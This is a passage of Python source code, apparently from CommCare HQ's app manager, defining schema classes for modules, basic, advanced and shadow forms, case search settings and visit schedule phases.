class DefaultCaseSearchProperty(DocumentSchema):
    """Case Properties with fixed value to search on"""
    property = StringProperty()
    default_value = StringProperty()
class CaseSearch(DocumentSchema):
    """
    Properties and search command label
    """
    # NOTE(review): mutable dict default — assumed safe because the property
    # framework copies defaults per instance; confirm before relying on it
    command_label = DictProperty(default={'en': 'Search All Cases'})
    properties = SchemaListProperty(CaseSearchProperty)
    relevant = StringProperty(default=CLAIM_DEFAULT_RELEVANT_CONDITION)
    search_button_display_condition = StringProperty()
    include_closed = BooleanProperty(default=False)
    default_properties = SchemaListProperty(DefaultCaseSearchProperty)
    blacklisted_owner_ids_expression = StringProperty()
class ParentSelect(DocumentSchema):
    """Configuration for selecting a parent case before the module's cases."""
    active = BooleanProperty(default=False)
    relationship = StringProperty(default='parent')
    module_id = StringProperty()


class FixtureSelect(DocumentSchema):
    """
    Configuration for creating a details screen from a fixture which can be used to pre-filter
    cases prior to displaying the case list.

    fixture_type:       FixtureDataType.tag
    display_column:     name of the column to display in the list
    localize:           boolean if display_column actually contains the key for the localized string
    variable_column:    name of the column whose value should be saved when the user selects an item
    xpath:              xpath expression to use as the case filter
    """
    active = BooleanProperty(default=False)
    fixture_type = StringProperty()
    display_column = StringProperty()
    localize = BooleanProperty(default=False)
    variable_column = StringProperty()
    xpath = StringProperty(default='')
class DetailPair(DocumentSchema):
    """The short (case list) and long (case detail) details for one entity."""
    short = SchemaProperty(Detail)
    long = SchemaProperty(Detail)

    @classmethod
    def wrap(cls, data):
        self = super(DetailPair, cls).wrap(data)
        # normalize the display type of each side on load
        self.short.display = 'short'
        self.long.display = 'long'
        return self
class CaseListForm(NavMenuItemMediaMixin):
    """A registration form reachable from a module's case list."""
    form_id = FormIdProperty('modules[*].case_list_form.form_id')
    # lang => button label
    label = DictProperty()
    post_form_workflow = StringProperty(
        default=WORKFLOW_DEFAULT,
        choices=REGISTRATION_FORM_WORFLOWS,
    )

    def rename_lang(self, old_lang, new_lang):
        _rename_key(self.label, old_lang, new_lang)

    def get_app(self):
        # `_module` back-reference is assigned by ModuleBase.assign_references
        return self._module.get_app()
class ModuleBase(IndexedSchema, ModuleMediaMixin, NavMenuItemMediaMixin, CommentMixin):
    """
    Shared base for all module types.  A module groups forms together with
    case configuration and navigation metadata; ``wrap`` dispatches to the
    concrete subclass based on the stored ``doc_type``.
    """
    # Localized module name, keyed by language code.
    name = DictProperty(six.text_type)
    unique_id = StringProperty()
    case_type = StringProperty()
    case_list_form = SchemaProperty(CaseListForm)
    module_filter = StringProperty()
    put_in_root = BooleanProperty(default=False)
    # unique_id of the parent menu, if this module is nested.
    root_module_id = StringProperty()
    fixture_select = SchemaProperty(FixtureSelect)
    auto_select_case = BooleanProperty(default=False)
    is_training_module = BooleanProperty(default=False)
    def __init__(self, *args, **kwargs):
        super(ModuleBase, self).__init__(*args, **kwargs)
        # Wire child schema objects back to this module.
        self.assign_references()
    @property
    def is_surveys(self):
        """True when the module tracks no cases (empty case type)."""
        return self.case_type == ""
    def assign_references(self):
        # Child DocumentSchema objects need an explicit back-pointer to their
        # module; couchdbkit does not set one for us.
        if hasattr(self, 'case_list'):
            self.case_list._module = self
        if hasattr(self, 'case_list_form'):
            self.case_list_form._module = self
    @classmethod
    def wrap(cls, data):
        # Polymorphic wrap: dispatch on doc_type only when called on the base
        # class; subclasses fall through to the normal wrap.
        if cls is ModuleBase:
            doc_type = data['doc_type']
            if doc_type == 'Module':
                return Module.wrap(data)
            elif doc_type == 'AdvancedModule':
                return AdvancedModule.wrap(data)
            elif doc_type == 'ReportModule':
                return ReportModule.wrap(data)
            elif doc_type == 'ShadowModule':
                return ShadowModule.wrap(data)
            else:
                raise ValueError('Unexpected doc_type for Module', doc_type)
        else:
            return super(ModuleBase, cls).wrap(data)
    def get_or_create_unique_id(self):
        """
        It is the caller's responsibility to save the Application
        after calling this function.
        WARNING: If called on the same doc in different requests without saving,
        this function will return a different uuid each time,
        likely causing unexpected behavior
        """
        if not self.unique_id:
            self.unique_id = uuid.uuid4().hex
        return self.unique_id
    get_forms = IndexedSchema.Getter('forms')
    def get_suite_forms(self):
        """Forms that should appear in the generated suite (excludes disabled release forms)."""
        return [f for f in self.get_forms() if not f.is_a_disabled_release_form()]
    @parse_int([1])
    def get_form(self, i):
        """Return the i-th form; negative i wraps via the modulo in with_id."""
        try:
            return self.forms[i].with_id(i % len(self.forms), self)
        except IndexError:
            raise FormNotFoundException()
    def get_form_index(self, unique_id):
        """Return the index of the form with ``unique_id`` or raise FormNotFoundException."""
        for index, form in enumerate(self.get_forms()):
            if form.unique_id == unique_id:
                return index
        error = _("Could not find form with ID='{unique_id}' in module '{module_name}'.").format(
            module_name=self.name, unique_id=unique_id)
        raise FormNotFoundException(error)
    def get_child_modules(self):
        """Modules in the app whose root_module_id points at this module."""
        return [
            module for module in self.get_app().get_modules()
            if module.unique_id != self.unique_id and getattr(module, 'root_module_id', None) == self.unique_id
        ]
    @property
    def root_module(self):
        # Returns None implicitly when this module has no parent menu.
        if self.root_module_id:
            return self._parent.get_module_by_unique_id(self.root_module_id,
                error=_("Could not find parent menu for '{}'").format(self.default_name()))
    def requires_case_details(self):
        # Overridden by module types that show case details.
        return False
    def root_requires_same_case(self):
        """True when the parent menu shares this case type and all its forms require a case."""
        return self.root_module \
            and self.root_module.case_type == self.case_type \
            and self.root_module.all_forms_require_a_case()
    def get_case_types(self):
        return set([self.case_type])
    def get_app(self):
        return self._parent
    def default_name(self, app=None):
        """Best-effort display name: app default language first, then other langs."""
        if not app:
            app = self.get_app()
        return trans(
            self.name,
            [app.default_language] + app.langs,
            include_lang=False
        )
    def rename_lang(self, old_lang, new_lang):
        """Rename a language code in this module's name, forms and details."""
        _rename_key(self.name, old_lang, new_lang)
        for form in self.get_forms():
            form.rename_lang(old_lang, new_lang)
        for _, detail, _ in self.get_details():
            detail.rename_lang(old_lang, new_lang)
    def get_form_by_unique_id(self, unique_id):
        # Returns None implicitly when no form matches.
        for form in self.get_forms():
            if form.get_unique_id() == unique_id:
                return form
    @property
    def validator(self):
        return ModuleBaseValidator(self)
    def validate_for_build(self):
        return self.validator.validate_for_build()
    @memoized
    def get_subcase_types(self):
        '''
        Return a set of each case type for which this module has a form that
        opens a new subcase of that type.
        '''
        subcase_types = set()
        for form in self.get_forms():
            if hasattr(form, 'get_subcase_types'):
                subcase_types.update(form.get_subcase_types())
        return subcase_types
    def get_custom_entries(self):
        """
        By default, suite entries are configured by forms, but you can also provide custom
        entries by overriding this function.
        See ReportModule for an example
        """
        return []
    def uses_media(self):
        """
        Whether the module uses media. If this returns false then media will not be generated
        for the module.
        """
        return True
    def uses_usercase(self):
        return False
    def add_insert_form(self, from_module, form, index=None, with_source=False):
        # Subclasses that can hold forms override this; the base rejects.
        raise IncompatibleFormTypeException()
    def update_app_case_meta(self, app_case_meta):
        pass
class ModuleDetailsMixin(object):
    """Detail-screen helpers shared by module types with case/referral details."""
    @classmethod
    def wrap_details(cls, data):
        # Lazy migration: split the legacy combined 'details' list into
        # separate case_details / ref_details pairs.
        if 'details' in data:
            try:
                case_short, case_long, ref_short, ref_long = data['details']
            except ValueError:
                # "need more than 0 values to unpack"
                pass
            else:
                data['case_details'] = {
                    'short': case_short,
                    'long': case_long,
                }
                data['ref_details'] = {
                    'short': ref_short,
                    'long': ref_long,
                }
            finally:
                # Always drop the legacy key, even when it was malformed.
                del data['details']
        return data
    @property
    def case_list_filter(self):
        try:
            return self.case_details.short.filter
        except AttributeError:
            return None
    @property
    def detail_sort_elements(self):
        try:
            return self.case_details.short.sort_elements
        except Exception:
            return []
    @property
    def search_detail(self):
        # Deep copy so callers can mutate the search detail independently.
        return deepcopy(self.case_details.short)
    def rename_lang(self, old_lang, new_lang):
        # NOTE(review): super(Module, ...) deliberately names the Module class,
        # not this mixin — presumably only safe when mixed into Module; confirm
        # before reusing this mixin elsewhere.
        super(Module, self).rename_lang(old_lang, new_lang)
        for case_list in (self.case_list, self.referral_list):
            case_list.rename_lang(old_lang, new_lang)
    def export_json(self, dump_json=True, keep_unique_id=False):
        """Serialize the module; optionally strips per-form unique_ids for re-import."""
        source = self.to_json()
        if not keep_unique_id:
            for form in source['forms']:
                del form['unique_id']
        return json.dumps(source) if dump_json else source
    def get_details(self):
        """Yield (slug, Detail, enabled) tuples for all detail screens of this module."""
        details = [
            ('case_short', self.case_details.short, True),
            ('case_long', self.case_details.long, True),
            ('ref_short', self.ref_details.short, False),
            ('ref_long', self.ref_details.long, False),
        ]
        if module_offers_search(self) and not self.case_details.short.custom_xml:
            details.append(('search_short', self.search_detail, True))
        return tuple(details)
class Module(ModuleBase, ModuleDetailsMixin):
    """
    A group of related forms, and configuration that applies to them all.
    Translates to a top-level menu on the phone.
    """
    module_type = 'basic'
    forms = SchemaListProperty(Form)
    case_details = SchemaProperty(DetailPair)
    ref_details = SchemaProperty(DetailPair)
    case_list = SchemaProperty(CaseList)
    referral_list = SchemaProperty(CaseList)
    task_list = SchemaProperty(CaseList)
    parent_select = SchemaProperty(ParentSelect)
    search_config = SchemaProperty(CaseSearch)
    display_style = StringProperty(default='list')
    @classmethod
    def wrap(cls, data):
        # Migrate the legacy combined 'details' list before normal wrapping.
        data = cls.wrap_details(data)
        return super(Module, cls).wrap(data)
    @classmethod
    def new_module(cls, name, lang):
        """Create an unsaved basic module with a default "Name" detail column."""
        detail = Detail(
            columns=[DetailColumn(
                format='plain',
                header={(lang or 'en'): ugettext("Name")},
                field='name',
                model='case',
                hasAutocomplete=True,
            )]
        )
        module = cls(
            name={(lang or 'en'): name or ugettext("Untitled Module")},
            forms=[],
            case_type='',
            case_details=DetailPair(
                short=Detail(detail.to_json()),
                long=Detail(detail.to_json()),
            ),
        )
        module.get_or_create_unique_id()
        return module
    @classmethod
    def new_training_module(cls, name, lang):
        """Same as new_module but flagged as a training module."""
        module = cls.new_module(name, lang)
        module.is_training_module = True
        return module
    def new_form(self, name, lang, attachment=Ellipsis):
        """Append a new Form; attachment defaults (via the Ellipsis sentinel) to blank form XML."""
        from corehq.apps.app_manager.views.utils import get_blank_form_xml
        lang = lang if lang else "en"
        name = name if name else _("Untitled Form")
        form = Form(
            name={lang: name},
        )
        self.forms.append(form)
        # Re-fetch through get_form so the form is wrapped with its id/parent.
        form = self.get_form(-1)
        if attachment == Ellipsis:
            attachment = get_blank_form_xml(name)
        form.source = attachment
        return form
    def add_insert_form(self, from_module, form, index=None, with_source=False):
        """
        Add ``form`` to this module, inserting at ``index`` when given.
        Advanced forms are only accepted when they carry no case actions;
        otherwise IncompatibleFormTypeException is raised.
        """
        if isinstance(form, Form):
            new_form = form
        elif isinstance(form, AdvancedForm) and not len(list(form.actions.get_all_actions())):
            # Downgrade an action-less advanced form to a basic Form.
            new_form = Form(
                name=form.name,
                form_filter=form.form_filter,
                media_image=form.media_image,
                media_audio=form.media_audio
            )
            new_form._parent = self
            form._parent = self
            if with_source:
                new_form.source = form.source
        else:
            raise IncompatibleFormTypeException(_('''
                Cannot move an advanced form with actions into a basic menu.
            '''))
        if index is not None:
            self.forms.insert(index, new_form)
        else:
            self.forms.append(new_form)
        return self.get_form(index or -1)
    @property
    def validator(self):
        return ModuleValidator(self)
    def requires(self):
        """Strongest requirement among this module's forms: referral > case > none."""
        r = set(["none"])
        for form in self.get_forms():
            r.add(form.requires)
        if self.case_list.show:
            r.add('case')
        if self.referral_list.show:
            r.add('referral')
        for val in ("referral", "case", "none"):
            if val in r:
                return val
    def requires_case_details(self):
        """True when the case list is shown or any form requires selecting a case."""
        ret = False
        if self.case_list.show:
            return True
        for form in self.get_forms():
            if form.requires_case():
                ret = True
                break
        return ret
    @memoized
    def all_forms_require_a_case(self):
        return all([form.requires == 'case' for form in self.get_forms()])
    def uses_usercase(self):
        """Return True if this module has any forms that use the usercase.
        """
        return any(form.uses_usercase() for form in self.get_forms())
    def grid_display_style(self):
        return self.display_style == 'grid'
    def update_app_case_meta(self, meta):
        """Register this module's detail columns with the app case metadata, skipping bad columns."""
        from corehq.apps.reports.formdetails.readable import CaseMetaException
        for column in self.case_details.long.columns:
            try:
                meta.add_property_detail('long', self.case_type, self.unique_id, column)
            except CaseMetaException:
                pass
        for column in self.case_details.short.columns:
            try:
                meta.add_property_detail('short', self.case_type, self.unique_id, column)
            except CaseMetaException:
                pass
class AdvancedForm(IndexedFormBase, FormMediaMixin, NavMenuItemMediaMixin):
    """A form with explicit case-management actions (load/update/open) and optional scheduling."""
    form_type = 'advanced_form'
    form_filter = StringProperty()
    actions = SchemaProperty(AdvancedFormActions)
    schedule = SchemaProperty(FormSchedule, default=None)
    @classmethod
    def wrap(cls, data):
        # lazy migration to swap keys with values in action preload dict.
        # http://manage.dimagi.com/default.asp?162213
        load_actions = data.get('actions', {}).get('load_update_cases', [])
        for action in load_actions:
            preload = action['preload']
            # Old data had question paths as values; paths start with '/'.
            if preload and list(preload.values())[0].startswith('/'):
                action['preload'] = {v: k for k, v in preload.items()}
        return super(AdvancedForm, cls).wrap(data)
    def pre_delete_hook(self):
        """Best-effort: detach from its schedule phase before deletion; log and continue on failure."""
        try:
            self.disable_schedule()
        except (ScheduleError, TypeError, AttributeError) as e:
            logging.error("There was a {error} while running the pre_delete_hook on {form_id}. "
                          "There is probably nothing to worry about, but you could check to make sure "
                          "that there are no issues with this form.".format(error=e, form_id=self.unique_id))
            pass
    def get_action_type(self):
        """Human-readable summary of this form's action tags grouped by action type."""
        actions = self.actions.actions_meta_by_tag
        by_type = defaultdict(list)
        action_type = []
        for action_tag, action_meta in six.iteritems(actions):
            by_type[action_meta.get('type')].append(action_tag)
        for type, tag_list in six.iteritems(by_type):
            action_type.append('{} ({})'.format(type, ', '.join(filter(None, tag_list))))
        return ' '.join(action_type)
    def pre_move_hook(self, from_module, to_module):
        """Best-effort: detach from its schedule phase when moved between modules."""
        if from_module != to_module:
            try:
                self.disable_schedule()
            except (ScheduleError, TypeError, AttributeError) as e:
                logging.error("There was a {error} while running the pre_move_hook on {form_id}. "
                              "There is probably nothing to worry about, but you could check to make sure "
                              "that there are no issues with this module.".format(error=e, form_id=self.unique_id))
                pass
    def add_stuff_to_xform(self, xform, build_profile_id=None):
        super(AdvancedForm, self).add_stuff_to_xform(xform, build_profile_id)
        xform.add_case_and_meta_advanced(self)
    def requires_case(self):
        """Form requires a case that must be selected by the user (excludes autoloaded cases)
        """
        return any(not action.auto_select for action in self.actions.load_update_cases)
    @property
    def requires(self):
        return 'case' if self.requires_case() else 'none'
    @property
    def validator(self):
        return AdvancedFormValidator(self)
    def is_registration_form(self, case_type=None):
        """
        Defined as form that opens a single case. If the case is a sub-case then
        the form is only allowed to load parent cases (and any auto-selected cases).
        """
        reg_actions = self.get_registration_actions(case_type)
        if len(reg_actions) != 1:
            return False
        load_actions = [action for action in self.actions.load_update_cases if not action.auto_select]
        if not load_actions:
            return True
        reg_action = reg_actions[0]
        if not reg_action.case_indices:
            return False
        # Work on a copy: check_parents pops entries as it walks the index chain.
        actions_by_tag = deepcopy(self.actions.actions_meta_by_tag)
        actions_by_tag.pop(reg_action.case_tag)
        def check_parents(tag):
            """Recursively check parent actions to ensure that all actions for this form are
            either parents of the registration action or else auto-select actions.
            """
            if not tag:
                return not actions_by_tag or all(
                    getattr(a['action'], 'auto_select', False) for a in actions_by_tag.values()
                )
            try:
                parent = actions_by_tag.pop(tag)
            except KeyError:
                return False
            return all(check_parents(p.tag) for p in parent['action'].case_indices)
        return all(check_parents(parent.tag) for parent in reg_action.case_indices)
    def get_registration_actions(self, case_type=None):
        """
        :return: List of actions that create a case. Subcase actions are included
                 as long as they are not inside a repeat. If case_type is not None
                 only return actions that create a case of the specified type.
        """
        registration_actions = [
            action for action in self.actions.get_open_actions()
            if not action.is_subcase or not action.repeat_context
        ]
        if case_type:
            registration_actions = [a for a in registration_actions if a.case_type == case_type]
        return registration_actions
    def uses_case_type(self, case_type, invert_match=False):
        """True when any load/update action targets (or, inverted, does not target) case_type."""
        def match(ct):
            matches = ct == case_type
            return not matches if invert_match else matches
        return any(action for action in self.actions.load_update_cases if match(action.case_type))
    def uses_usercase(self):
        return self.uses_case_type(USERCASE_TYPE)
    def all_other_forms_require_a_case(self):
        m = self.get_module()
        return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])
    def get_module(self):
        return self._parent
    def get_phase(self):
        """Return the schedule phase containing this form, or None."""
        module = self.get_module()
        return next((phase for phase in module.get_schedule_phases()
                     for form in phase.get_forms()
                     if form.unique_id == self.unique_id),
                    None)
    def disable_schedule(self):
        """Turn the schedule off and remove this form from its phase, if any."""
        if self.schedule:
            self.schedule.enabled = False
        phase = self.get_phase()
        if phase:
            phase.remove_form(self)
    def get_case_updates(self):
        """Map of case type -> set of formatted property updates, including scheduler updates."""
        updates_by_case_type = defaultdict(set)
        format_key = self.get_case_property_name_formatter()
        for action in self.actions.get_all_actions():
            case_type = action.case_type
            updates_by_case_type[case_type].update(
                format_key(*item) for item in six.iteritems(action.case_properties))
        if self.schedule and self.schedule.enabled and self.source:
            xform = self.wrapped_xform()
            self.add_stuff_to_xform(xform)
            scheduler_updates = xform.get_scheduler_case_updates()
        else:
            scheduler_updates = {}
        for case_type, updates in scheduler_updates.items():
            updates_by_case_type[case_type].update(updates)
        return updates_by_case_type
    @memoized
    def get_all_contributed_subcase_properties(self):
        """Map of subcase type -> case property names written by this form's subcase actions."""
        case_properties = defaultdict(set)
        for subcase in self.actions.get_subcase_actions():
            case_properties[subcase.case_type].update(list(subcase.case_properties.keys()))
        return case_properties
    @memoized
    def get_contributed_case_relationships(self):
        """Map of child case type -> set of (parent case type, relationship) pairs."""
        case_relationships_by_child_type = defaultdict(set)
        for subcase in self.actions.get_subcase_actions():
            child_case_type = subcase.case_type
            for case_index in subcase.case_indices:
                parent = self.actions.get_action_from_tag(case_index.tag)
                if parent:
                    case_relationships_by_child_type[child_case_type].add(
                        (parent.case_type, case_index.reference_id or 'parent'))
        return case_relationships_by_child_type
    def update_app_case_meta(self, app_case_meta):
        """Record every case property save/load this form performs into the app case metadata."""
        from corehq.apps.reports.formdetails.readable import FormQuestionResponse
        questions = {
            q['value']: FormQuestionResponse(q)
            for q in self.get_questions(self.get_app().langs, include_translations=True)
        }
        self._add_save_to_case_questions(questions, app_case_meta)
        for action in self.actions.load_update_cases:
            for name, question_path in action.case_properties.items():
                self.add_property_save(
                    app_case_meta,
                    action.case_type,
                    name,
                    questions,
                    question_path
                )
            for question_path, name in action.preload.items():
                self.add_property_load(
                    app_case_meta,
                    action.case_type,
                    name,
                    questions,
                    question_path
                )
            if action.close_condition.is_active():
                meta = app_case_meta.get_type(action.case_type)
                meta.add_closer(self.unique_id, action.close_condition)
        for action in self.actions.open_cases:
            self.add_property_save(
                app_case_meta,
                action.case_type,
                'name',
                questions,
                action.name_path,
                action.open_condition
            )
            for name, question_path in action.case_properties.items():
                self.add_property_save(
                    app_case_meta,
                    action.case_type,
                    name,
                    questions,
                    question_path,
                    action.open_condition
                )
            meta = app_case_meta.get_type(action.case_type)
            meta.add_opener(self.unique_id, action.open_condition)
            if action.close_condition.is_active():
                meta.add_closer(self.unique_id, action.close_condition)
class ShadowForm(AdvancedForm):
    """A form that mirrors another advanced form's source/actions, with local action overrides."""
    form_type = 'shadow_form'
    # The unique id of the form we are shadowing
    shadow_parent_form_id = FormIdProperty("modules[*].forms[*].shadow_parent_form_id")
    # form actions to be merged with the parent actions
    extra_actions = SchemaProperty(AdvancedFormActions)
    def __init__(self, *args, **kwargs):
        super(ShadowForm, self).__init__(*args, **kwargs)
        # Cache for the resolved parent form (see shadow_parent_form).
        self._shadow_parent_form = None
    @property
    def shadow_parent_form(self):
        """The shadowed form, resolved lazily and re-fetched when the id changes; None if missing."""
        if not self.shadow_parent_form_id:
            return None
        else:
            if not self._shadow_parent_form or self._shadow_parent_form.unique_id != self.shadow_parent_form_id:
                app = self.get_app()
                try:
                    self._shadow_parent_form = app.get_form(self.shadow_parent_form_id)
                except FormNotFoundException:
                    self._shadow_parent_form = None
            return self._shadow_parent_form
    @property
    def source(self):
        # A shadow form has no XML of its own; it borrows the parent's.
        if self.shadow_parent_form:
            return self.shadow_parent_form.source
        from corehq.apps.app_manager.views.utils import get_blank_form_xml
        return get_blank_form_xml("")
    def get_validation_cache(self):
        if not self.shadow_parent_form:
            return None
        return self.shadow_parent_form.validation_cache
    def set_validation_cache(self, cache):
        if self.shadow_parent_form:
            self.shadow_parent_form.validation_cache = cache
    @property
    def xmlns(self):
        if not self.shadow_parent_form:
            return None
        else:
            return self.shadow_parent_form.xmlns
    @property
    def actions(self):
        """Parent form's actions merged with this form's extra_actions overrides."""
        if not self.shadow_parent_form:
            shadow_parent_actions = AdvancedFormActions()
        else:
            shadow_parent_actions = self.shadow_parent_form.actions
        return self._merge_actions(shadow_parent_actions, self.extra_actions)
    @property
    def validator(self):
        return ShadowFormValidator(self)
    def get_shadow_parent_options(self):
        """(form_id, label) choices of advanced forms this form could shadow."""
        options = [
            (form.get_unique_id(), '{} / {}'.format(form.get_module().default_name(), form.default_name()))
            for form in self.get_app().get_forms() if form.form_type == "advanced_form"
        ]
        # Keep a dangling reference visible so the user can correct it.
        if self.shadow_parent_form_id and self.shadow_parent_form_id not in [x[0] for x in options]:
            options = [(self.shadow_parent_form_id, ugettext_lazy("Unknown, please change"))] + options
        return options
    @staticmethod
    def _merge_actions(source_actions, extra_actions):
        """Overlay selected properties of extra load/update actions onto the source actions."""
        new_actions = []
        source_action_map = {
            action.case_tag: action
            for action in source_actions.load_update_cases
        }
        # Only these properties may be overridden by the shadow form.
        overwrite_properties = [
            "case_type",
            "details_module",
            "auto_select",
            "load_case_from_fixture",
            "show_product_stock",
            "product_program",
            "case_index",
        ]
        for action in extra_actions.load_update_cases:
            if action.case_tag in source_action_map:
                new_action = LoadUpdateAction.wrap(source_action_map[action.case_tag].to_json())
            else:
                new_action = LoadUpdateAction(case_tag=action.case_tag)
            for prop in overwrite_properties:
                setattr(new_action, prop, getattr(action, prop))
            new_actions.append(new_action)
        return AdvancedFormActions(
            load_update_cases=new_actions,
            open_cases=source_actions.open_cases,  # Shadow form is not allowed to specify any open case actions
        )
class SchedulePhaseForm(IndexedSchema):
    """
    A reference to a form in a schedule phase.
    """
    form_id = FormIdProperty("modules[*].schedule_phases[*].forms[*].form_id")
class SchedulePhase(IndexedSchema):
    """
    SchedulePhases are attached to a module.
    A Schedule Phase is a grouping of forms that occur within a period and share an anchor
    A module should not have more than one SchedulePhase with the same anchor
    anchor: Case property containing a date after which this phase becomes active
    forms: The forms that are to be filled out within this phase
    """
    anchor = StringProperty()
    forms = SchemaListProperty(SchedulePhaseForm)
    @property
    def id(self):
        """ A Schedule Phase is 1-indexed """
        _id = super(SchedulePhase, self).id
        return _id + 1
    @property
    def phase_id(self):
        return "{}_{}".format(self.anchor, self.id)
    def get_module(self):
        return self._parent
    _get_forms = IndexedSchema.Getter('forms')
    def get_forms(self):
        """Returns the actual form objects related to this phase"""
        module = self.get_module()
        return (module.get_form_by_unique_id(form.form_id) for form in self._get_forms())
    def get_form(self, desired_form):
        """Return this phase's form matching desired_form's unique_id, or None."""
        return next((form for form in self.get_forms() if form.unique_id == desired_form.unique_id), None)
    def get_phase_form_index(self, form):
        """
        Returns the index of the form with respect to the phase
        schedule_phase.forms = [a,b,c]
        schedule_phase.get_phase_form_index(b)
        => 1
        schedule_phase.get_phase_form_index(c)
        => 2
        """
        return next((phase_form.id for phase_form in self._get_forms() if phase_form.form_id == form.unique_id),
                    None)
    def remove_form(self, form):
        """Remove a form from the phase"""
        idx = self.get_phase_form_index(form)
        if idx is None:
            raise ScheduleError("That form doesn't exist in the phase")
        self.forms.remove(self.forms[idx])
    def add_form(self, form):
        """Adds a form to this phase, removing it from other phases"""
        old_phase = form.get_phase()
        if old_phase is not None and old_phase.anchor != self.anchor:
            old_phase.remove_form(form)
        if self.get_form(form) is None:
            self.forms.append(SchedulePhaseForm(form_id=form.unique_id))
    def change_anchor(self, new_anchor):
        """Set a new anchor property; raises ScheduleError on blank or duplicate anchors."""
        if new_anchor is None or new_anchor.strip() == '':
            raise ScheduleError(_("You can't create a phase without an anchor property"))
        self.anchor = new_anchor
        # Validate after assignment: duplicates are detected via the module.
        if self.get_module().phase_anchors.count(new_anchor) > 1:
            raise ScheduleError(_("You can't have more than one phase with the anchor {}").format(new_anchor))
class AdvancedModule(ModuleBase):
    """A module of advanced forms, with product details and optional visit scheduling."""
    module_type = 'advanced'
    forms = SchemaListProperty(FormBase)
    case_details = SchemaProperty(DetailPair)
    product_details = SchemaProperty(DetailPair)
    case_list = SchemaProperty(CaseList)
    has_schedule = BooleanProperty()
    schedule_phases = SchemaListProperty(SchedulePhase)
    get_schedule_phases = IndexedSchema.Getter('schedule_phases')
    search_config = SchemaProperty(CaseSearch)
    @property
    def is_surveys(self):
        # Advanced modules always manage cases.
        return False
    @classmethod
    def wrap(cls, data):
        # lazy migration to accommodate search_config as empty list
        # http://manage.dimagi.com/default.asp?231186
        if data.get('search_config') == []:
            data['search_config'] = {}
        return super(AdvancedModule, cls).wrap(data)
    @classmethod
    def new_module(cls, name, lang):
        """Create an unsaved advanced module with default case and product details."""
        detail = Detail(
            columns=[DetailColumn(
                format='plain',
                header={(lang or 'en'): ugettext("Name")},
                field='name',
                model='case',
            )]
        )
        module = AdvancedModule(
            name={(lang or 'en'): name or ugettext("Untitled Module")},
            forms=[],
            case_type='',
            case_details=DetailPair(
                short=Detail(detail.to_json()),
                long=Detail(detail.to_json()),
            ),
            product_details=DetailPair(
                short=Detail(
                    columns=[
                        DetailColumn(
                            format='plain',
                            header={(lang or 'en'): ugettext("Product")},
                            field='name',
                            model='product',
                        ),
                    ],
                ),
                long=Detail(),
            ),
        )
        module.get_or_create_unique_id()
        return module
    def new_form(self, name, lang, attachment=Ellipsis):
        """Append a new AdvancedForm with a disabled schedule; attachment defaults to blank XML."""
        from corehq.apps.app_manager.views.utils import get_blank_form_xml
        lang = lang if lang else "en"
        name = name if name else _("Untitled Form")
        form = AdvancedForm(
            name={lang: name},
        )
        form.schedule = FormSchedule(enabled=False)
        self.forms.append(form)
        form = self.get_form(-1)
        if attachment == Ellipsis:
            attachment = get_blank_form_xml(name)
        form.source = attachment
        return form
    def new_shadow_form(self, name, lang):
        """Append a new ShadowForm (no XML of its own; no_vellum)."""
        lang = lang if lang else "en"
        name = name if name else _("Untitled Form")
        form = ShadowForm(
            name={lang: name},
            no_vellum=True,
        )
        form.schedule = FormSchedule(enabled=False)
        self.forms.append(form)
        form = self.get_form(-1)
        form.get_unique_id()  # This function sets the unique_id. Normally setting the source sets the id.
        return form
    def add_insert_form(self, from_module, form, index=None, with_source=False):
        """
        Add ``form`` to this module, converting a basic Form's case actions
        into the equivalent advanced load/update/open actions.
        """
        if isinstance(form, AdvancedForm):
            new_form = form
        elif isinstance(form, Form):
            new_form = AdvancedForm(
                name=form.name,
                form_filter=form.form_filter,
                media_image=form.media_image,
                media_audio=form.media_audio,
                comment=form.comment,
            )
            new_form._parent = self
            form._parent = self
            if with_source:
                new_form.source = form.source
            actions = form.active_actions()
            open = actions.get('open_case', None)
            update = actions.get('update_case', None)
            close = actions.get('close_case', None)
            preload = actions.get('case_preload', None)
            subcases = actions.get('subcases', None)
            case_type = from_module.case_type
            base_action = None
            if open:
                # Open+update collapse into a single advanced open action.
                base_action = AdvancedOpenCaseAction(
                    case_type=case_type,
                    case_tag='open_{0}_0'.format(case_type),
                    name_path=open.name_path,
                    open_condition=open.condition,
                    case_properties=update.update if update else {},
                )
                new_form.actions.open_cases.append(base_action)
            elif update or preload or close:
                base_action = LoadUpdateAction(
                    case_type=case_type,
                    case_tag='load_{0}_0'.format(case_type),
                    case_properties=update.update if update else {},
                    preload=preload.preload if preload else {}
                )
                if from_module.parent_select.active:
                    from_app = from_module.get_app()  # A form can be copied from a module in a different app.
                    select_chain = get_select_chain(from_app, from_module, include_self=False)
                    # Build one load action per ancestor, chained via parent tags.
                    for n, link in enumerate(reversed(list(enumerate(select_chain)))):
                        i, module = link
                        new_form.actions.load_update_cases.append(LoadUpdateAction(
                            case_type=module.case_type,
                            case_tag='_'.join(['parent'] * (i + 1)),
                            details_module=module.unique_id,
                            case_index=CaseIndex(tag='_'.join(['parent'] * (i + 2)) if n > 0 else '')
                        ))
                    base_action.case_indices = [CaseIndex(tag='parent')]
                if close:
                    base_action.close_condition = close.condition
                new_form.actions.load_update_cases.append(base_action)
            if subcases:
                for i, subcase in enumerate(subcases):
                    open_subcase_action = AdvancedOpenCaseAction(
                        case_type=subcase.case_type,
                        case_tag='open_{0}_{1}'.format(subcase.case_type, i+1),
                        name_path=subcase.case_name,
                        open_condition=subcase.condition,
                        case_properties=subcase.case_properties,
                        repeat_context=subcase.repeat_context,
                        case_indices=[CaseIndex(
                            tag=base_action.case_tag if base_action else '',
                            reference_id=subcase.reference_id,
                        )]
                    )
                    new_form.actions.open_cases.append(open_subcase_action)
        else:
            raise IncompatibleFormTypeException()
        if index is not None:
            self.forms.insert(index, new_form)
        else:
            self.forms.append(new_form)
        return self.get_form(index or -1)
    def rename_lang(self, old_lang, new_lang):
        super(AdvancedModule, self).rename_lang(old_lang, new_lang)
        self.case_list.rename_lang(old_lang, new_lang)
    def requires_case_details(self):
        # Implicitly returns None (falsy) when neither condition holds.
        if self.case_list.show:
            return True
        for form in self.forms:
            if any(action.case_type == self.case_type for action in form.actions.load_update_cases):
                return True
    def all_forms_require_a_case(self):
        return all(form.requires_case() for form in self.forms)
    @property
    def search_detail(self):
        # Deep copy so callers can mutate the search detail independently.
        return deepcopy(self.case_details.short)
    def get_details(self):
        """(slug, Detail, enabled) tuples; product details only when commtrack is enabled."""
        details = [
            ('case_short', self.case_details.short, True),
